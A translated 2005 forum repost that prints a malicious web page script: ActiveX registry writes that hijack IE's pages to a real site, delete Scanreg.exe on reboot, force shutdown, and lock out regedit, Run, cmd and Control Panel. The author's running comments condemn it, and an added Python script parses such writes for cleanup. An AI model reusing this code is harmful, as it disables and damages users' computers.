The Definitive Guide to Malicious Web Page Code (repost)
#1
Author: 荻芦夜雪
Lately, malicious web page code that modifies the local registry has been causing quite an uproar. It started with changing the IE title bar, moved on to changing the home page, and has even progressed to locking the Internet Options dialog and the Registry Editor so that users cannot restore their own IE! It keeps getting worse. Changing the title was, at first, like a kid running up to someone's front door and scrawling "so-and-so was here" in chalk; later it degenerated into a robber trying to seize the whole house. The webmaster's original intention was perhaps just to get a few more visits to his site, but unfortunately he chose the wrong method: once burned, visitors will never come back to his site. Enough talk; let's take a look at what is actually going on.
All of this is done with ActiveX and JavaScript. Let's look at this dangerous code. Anyone who browses this page will have both IE and the system mangled beyond recognition, left able to use only a few basic Windows programs. Ruthless enough.
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function

function f(){
try
{
//ActiveX initialization (this initializes the ActiveX control in preparation for modifying the visitor's registry)
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
//set home page
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u /autorun"); // Note this line: Scanreg.exe gets deleted! That prevents the visitor from repairing the system by restoring the registry backup taken before browsing. Think about what that means: since it can delete files on the machine without consent, it can do other things too, including formatting the hard disk without any warning!
// From here on, IE's title, home page, search page and so on get completely trashed. If you saw it with your own eyes you would be tempted to ask: is this the IE that keeps me company while I surf every day? :)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\backbitmapie5","c:\\Windows\\web\\wvleft.bmp");
Shl.RegWrite ("HKCR\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKCU\\Software\\Classes\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "=     ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "=     ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SearchPage","http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", " http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","rem C:\\WINDOWS\\sys tem\\BROWSEUI.DLL");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar", "1","REG_DWORD"); // The "Settings\Taskbar and Start Menu" command in the Start menu is disabled
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind","1","REG_DWORD"); // The "Find" command is disabled
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions","1","REG_DWORD"); // Prevents IE from showing "Internet Options" under "Tools"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu","1","REG_DWORD"); // Disables the right mouse button. Come on, even this gets disabled? :(
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun","1","REG_DWORD"); // Disables "Run" in the Start menu.
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd","1","REG_DWORD"); // Disables running the command interpreter
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","1","REG_DWORD"); // Prevents the operating system from switching to DOS real mode
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "问候"); // A dialog pops up at every boot. Follows you around like a ghost.
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","朋友:非常感谢你访问过我们的网站<http://user.netomia.com/wjkplx/>经测试你的电脑存在严重的漏洞隐患,你的电脑已被设置了一些障碍,只能运行一少部份程序。请点击桌面上的【安全测试网】快捷键上我们的网站去恢复,点击秘密特区链接,按提示做即可。或者点击下载解锁程序。");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD"); // Disables IE's context menu
Shl.RegWrite ("HKLM\\Software\\CLASSES\\.reg\\","txtfile"); // Disables .reg files. Unlocking by editing a REG file is no longer possible. :( What a black-hearted webmaster; I for one would love to PK him, what about you?
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\sys tem\\DisableRegistryTools","1","REG_DWORD"); // Disables the registry editor regedit.exe
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","1","REG_DWORD"); // Disables "Control Panel". Why do I get the feeling this webmaster runs an Internet cafe? Heh
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD"); // Disables IE's context menu. Terrified that someone might look at his source code
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions","1","REG_DWORD"); // Disables Internet Options
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserSaveAs","1","REG_DWORD"); // Disables "Save As..."
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFileOpen","1","REG_DWORD"); // Disables "Open" under the "File" menu
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoTheaterMode","1","REG_DWORD"); // Disables control of the IE control panel in full-screen mode
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Advanced","1","REG_DWORD"); // Prevents changing the Advanced page settings
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Cache Internet","1","REG_DWORD"); // Prevents changing the temporary files settings
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\AutoConfig","1","REG_DWORD"); // Prevents changing the automatic configuration settings
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage","1","REG_DWORD"); // Prevents changing the home page setting
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\History","1","REG_DWORD"); // Prevents changing the history settings
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Connwiz Admin Lock","1","REG_DWORD"); // Disables the Internet Connection Wizard
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Check_If_Default","1","REG_DWORD"); // Prevents changing the default browser check
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ContentTab","1","REG_DWORD"); // Disables the Content tab
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\安全测试网"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\blank"," http://user.netomia.com/wjkplx/"); // Can't he sleep if there is a single corner of IE without his site in it?
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecurityTab","1","REG_DWORD"); // Disables the Security tab
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ResetWebSettings","1","REG_DWORD"); // Disables the "Reset Web Settings" function
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD"); // Disables "Source". Dressed up as "protecting intellectual property".
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions\\NoAddingSubScriptions","1","REG_DWORD"); // Prevents adding offline page schedules
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu","1","REG_DWORD"); // Disables the "File" menu in Explorer
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Settings","1","REG_DWORD"); // Prevents changing the connection settings
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","1","REG_DWORD"); // Prohibits running any program at all! Truly devious; the webmaster must be afraid we don't know how to use a computer and would break it, so he kindly locks it up for us. A few basic programs are still left open below, though: Iexplore.exe, ACDSee32.exe and so on. Look at the program names below and you'll know what you can run.
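
The post shows the attack from the page's side; a responder mostly needs the reverse view: which registry writes a suspicious page would make, what each one does, and what has to be reverted. The following Python script is an added example, not code from the original post or from its author. It scans JavaScript text for the `RegWrite(key, value[, type])` calls the post dissects, unescapes the key paths, assigns each write a category of my own naming (persistence, lockout, browser-hijack, logon-banner, shell-tamper), lists any planted URLs, and derives a cleanup step per write. `SAMPLE_SCRIPT` is constructed to mirror the post's pattern, with `example.invalid` as a placeholder host; the split-line call is included on purpose because the post's own script contains one.

```python
"""Static triage of ActiveX-driven registry writes found in a web page.

Added example, not code from the original post: it scans JavaScript text
for WScript.Shell-style RegWrite calls (the pattern the post dissects),
unescapes each key path, classifies the write by the damage it does, and
derives the cleanup steps a responder would need. SAMPLE_SCRIPT below is
constructed to mirror the post's pattern; the URL is a placeholder.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# RegWrite(key, value[, type]) with JS double-quoted string literals.
# Whitespace (even a newline) is allowed between RegWrite and "(".
REGWRITE_RE = re.compile(
    r'RegWrite\s*\(\s*"((?:[^"\\]|\\.)*)"'   # key path
    r'\s*,\s*"((?:[^"\\]|\\.)*)"'            # value data
    r'(?:\s*,\s*"([^"]*)")?\s*\)'            # optional value type
)
URL_RE = re.compile(r'https?://[^\s"<>]+')


@dataclass(frozen=True)
class RegWrite:
    key: str
    value: str
    vtype: str
    category: str


def js_unescape(s: str) -> str:
    """Collapse the JS escapes that matter for registry paths (double backslash, escaped quote)."""
    return s.replace('\\\\', '\\').replace('\\"', '"')


def classify(key: str) -> str:
    """Category names are this example's own, chosen from the post's commentary."""
    k = key.lower()
    if '\\currentversion\\runonce\\' in k or '\\currentversion\\run\\' in k:
        return 'persistence'      # command executes at next logon/boot
    if '\\policies\\' in k:
        return 'lockout'          # restriction policies that block recovery
    if '\\winlogon\\legalnotice' in k:
        return 'logon-banner'     # message shown at every logon
    if 'internet explorer\\' in k and any(
            t in k for t in ('\\main\\', '\\abouturls\\', '\\typedurls\\', '\\toolbar\\')):
        return 'browser-hijack'   # home/search page, title, history
    if '\\classes\\' in k or k.startswith('hkcr\\'):
        return 'shell-tamper'     # CLSID / file association changes
    return 'other'


def extract_writes(script: str) -> list[RegWrite]:
    writes = []
    for m in REGWRITE_RE.finditer(script):
        key = js_unescape(m.group(1))
        value = js_unescape(m.group(2))
        vtype = m.group(3) or 'REG_SZ'   # WScript.Shell default when type is omitted
        writes.append(RegWrite(key, value, vtype, classify(key)))
    return writes


def summarize(writes: list[RegWrite]) -> dict[str, int]:
    return dict(Counter(w.category for w in writes))


def hijack_urls(writes: list[RegWrite]) -> set[str]:
    """URLs planted as data: the indicator worth blocking at the proxy/DNS layer."""
    return {u for w in writes for u in URL_RE.findall(w.value)}


def cleanup_plan(writes: list[RegWrite]) -> list[str]:
    """One remediation step per write; real cleanup runs from a clean boot or another account."""
    plan = []
    for w in writes:
        parent, _, name = w.key.rstrip('\\').rpartition('\\')
        if w.category in ('persistence', 'lockout', 'logon-banner'):
            plan.append(f"delete value '{name}' under {parent}")
        elif w.category == 'browser-hijack':
            plan.append(f"reset value '{name}' under {parent} to a trusted setting")
        else:
            plan.append(f"restore default data for key {w.key}")
    return plan


# Constructed sample mirroring the post's script; example.invalid is a placeholder.
SAMPLE_SCRIPT = r'''
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid/hijack/");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SearchPage","http://example.invalid/hijack/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun","1","REG_DWORD");
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind","1","REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\CLASSES\\.reg\\","txtfile");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "hello");
'''

if __name__ == '__main__':
    found = extract_writes(SAMPLE_SCRIPT)
    print(summarize(found))
    print(hijack_urls(found))
    for step in cleanup_plan(found):
        print(' -', step)
```

Two design points: the category check tests for `\Policies\` before the Internet Explorer paths, because the `Software\Policies\Microsoft\Internet Explorer\Restrictions` keys in the post are lockouts, not hijacks, and a missed lockout is what leaves the user unable to repair anything else. The cleanup plan is deliberately a list of steps rather than live registry calls: on a machine where `DisableRegistryTools` and `RestrictRun` have already been set, the fix has to be applied from another account or an offline registry hive, not from the locked session.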


Thread contents
The Definitive Guide to Malicious Web Page Code (repost) - by andy_chai_123 - 2005-9-24 13:44
[untitled] - by andy_chai_123 - 2005-9-24 13:45
Actually.. - by Metmet - 2005-9-24 21:19
[untitled] - by andy_chai_123 - 2005-9-25 12:30
......... - by yanghuan - 2005-10-5 18:39
[untitled] - by andy_chai_123 - 2005-10-5 21:50
